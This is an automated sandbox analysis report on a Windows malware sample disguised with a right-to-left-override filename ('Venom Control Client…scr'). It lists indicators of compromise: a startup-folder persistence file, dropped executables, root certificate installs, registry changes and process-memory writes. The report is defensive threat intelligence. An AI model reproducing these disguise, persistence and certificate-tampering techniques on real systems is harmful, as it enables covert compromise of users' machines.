3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74

Analysis

max time kernel
18s
max time network
34s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
21/11/2023, 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Venom Control Client‮nls..scr
Size

571KB
MD5

f1bc7841474849a77e8e0b2e507f2ac7
SHA1

eea072584a9227f763d15d784eb52c64453c9505
SHA256

3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74
SHA512

e9d342ea6620fc1b69868d5b503363a685a50e7184ba28c310f9648b85ebbb3684eb5be08ff5dd678e1026499fe2c562eb45b0c28228e96b7746553f6a1d12b7
SSDEEP

12288:C7oVrmFrSStI0kPUjGn61DfVwZ3pSOPXb2c1wxC3Si+hjTO6HH:3i/i4Jt9wZ3/bTwxQgVTOOH

Score

8^/10

upx

Malware Config

Signatures

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe	ux6K1QygnO.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe	ux6K1QygnO.exe

Executes dropped EXE 7 IoCs

pid	Process
304	78hnPz4s62.exe
1760	6Md9Aew2tf.exe
1288	zmCi7J94DB.exe
2140	mARvvq5cfi.exe
652	L4j0o8Sxat.exe
1352	mJ7fcXdNf0.exe
2928	ux6K1QygnO.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2112-0-0x000000013FF90000-0x00000001400F4000-memory.dmp	upx
behavioral1/memory/2112-208-0x000000013FF90000-0x00000001400F4000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\.sln	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\.sln\ = "sln_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file\shell\Read\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000_CLASSES\sln_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Venom Control Client‮nls..scr
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Venom Control Client‮nls..scr
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Venom Control Client‮nls..scr
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Venom Control Client‮nls..scr
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Venom Control Client‮nls..scr

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2928	ux6K1QygnO.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
340	powershell.exe
1844	powershell.exe
2092	powershell.exe
1852	powershell.exe
2728	powershell.exe
2856	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2928	ux6K1QygnO.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1396	AcroRd32.exe
1396	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 2784	2112	Venom Control Client‮nls..scr	28
PID 2112 wrote to memory of 2784	2112	Venom Control Client‮nls..scr	28
PID 2112 wrote to memory of 2784	2112	Venom Control Client‮nls..scr	28
PID 2784 wrote to memory of 1036	2784	cmd.exe	30
PID 2784 wrote to memory of 1036	2784	cmd.exe	30
PID 2784 wrote to memory of 1036	2784	cmd.exe	30
PID 2112 wrote to memory of 1500	2112	Venom Control Client‮nls..scr	31
PID 2112 wrote to memory of 1500	2112	Venom Control Client‮nls..scr	31
PID 2112 wrote to memory of 1500	2112	Venom Control Client‮nls..scr	31
PID 1500 wrote to memory of 304	1500	cmd.exe	33
PID 1500 wrote to memory of 304	1500	cmd.exe	33
PID 1500 wrote to memory of 304	1500	cmd.exe	33
PID 2112 wrote to memory of 1636	2112	Venom Control Client‮nls..scr	34
PID 2112 wrote to memory of 1636	2112	Venom Control Client‮nls..scr	34
PID 2112 wrote to memory of 1636	2112	Venom Control Client‮nls..scr	34
PID 1636 wrote to memory of 1760	1636	cmd.exe	36
PID 1636 wrote to memory of 1760	1636	cmd.exe	36
PID 1636 wrote to memory of 1760	1636	cmd.exe	36
PID 2112 wrote to memory of 2772	2112	Venom Control Client‮nls..scr	37
PID 2112 wrote to memory of 2772	2112	Venom Control Client‮nls..scr	37
PID 2112 wrote to memory of 2772	2112	Venom Control Client‮nls..scr	37
PID 2772 wrote to memory of 1288	2772	cmd.exe	39
PID 2772 wrote to memory of 1288	2772	cmd.exe	39
PID 2772 wrote to memory of 1288	2772	cmd.exe	39
PID 2112 wrote to memory of 3044	2112	Venom Control Client‮nls..scr	40
PID 2112 wrote to memory of 3044	2112	Venom Control Client‮nls..scr	40
PID 2112 wrote to memory of 3044	2112	Venom Control Client‮nls..scr	40
PID 1760 wrote to memory of 1852	1760	6Md9Aew2tf.exe	41
PID 1760 wrote to memory of 1852	1760	6Md9Aew2tf.exe	41
PID 1760 wrote to memory of 1852	1760	6Md9Aew2tf.exe	41
PID 304 wrote to memory of 2092	304	78hnPz4s62.exe	43
PID 304 wrote to memory of 2092	304	78hnPz4s62.exe	43
PID 304 wrote to memory of 2092	304	78hnPz4s62.exe	43
PID 3044 wrote to memory of 2140	3044	cmd.exe	46
PID 3044 wrote to memory of 2140	3044	cmd.exe	46
PID 3044 wrote to memory of 2140	3044	cmd.exe	46
PID 1288 wrote to memory of 340	1288	zmCi7J94DB.exe	47
PID 1288 wrote to memory of 340	1288	zmCi7J94DB.exe	47
PID 1288 wrote to memory of 340	1288	zmCi7J94DB.exe	47
PID 2112 wrote to memory of 984	2112	Venom Control Client‮nls..scr	49
PID 2112 wrote to memory of 984	2112	Venom Control Client‮nls..scr	49
PID 2112 wrote to memory of 984	2112	Venom Control Client‮nls..scr	49
PID 2140 wrote to memory of 1844	2140	mARvvq5cfi.exe	52
PID 2140 wrote to memory of 1844	2140	mARvvq5cfi.exe	52
PID 2140 wrote to memory of 1844	2140	mARvvq5cfi.exe	52
PID 984 wrote to memory of 652	984	cmd.exe	53
PID 984 wrote to memory of 652	984	cmd.exe	53
PID 984 wrote to memory of 652	984	cmd.exe	53
PID 2112 wrote to memory of 1384	2112	Venom Control Client‮nls..scr	54
PID 2112 wrote to memory of 1384	2112	Venom Control Client‮nls..scr	54
PID 2112 wrote to memory of 1384	2112	Venom Control Client‮nls..scr	54
PID 1384 wrote to memory of 1352	1384	cmd.exe	56
PID 1384 wrote to memory of 1352	1384	cmd.exe	56
PID 1384 wrote to memory of 1352	1384	cmd.exe	56
PID 2112 wrote to memory of 3068	2112	Venom Control Client‮nls..scr	58
PID 2112 wrote to memory of 3068	2112	Venom Control Client‮nls..scr	58
PID 2112 wrote to memory of 3068	2112	Venom Control Client‮nls..scr	58
PID 3068 wrote to memory of 2928	3068	cmd.exe	59
PID 3068 wrote to memory of 2928	3068	cmd.exe	59
PID 3068 wrote to memory of 2928	3068	cmd.exe	59
PID 3068 wrote to memory of 2928	3068	cmd.exe	59
PID 1036 wrote to memory of 1396	1036	rundll32.exe	60
PID 1036 wrote to memory of 1396	1036	rundll32.exe	60
PID 1036 wrote to memory of 1396	1036	rundll32.exe	60

C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr
"C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr" /S
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\wSxCV3FIoS.sln
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wSxCV3FIoS.sln
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
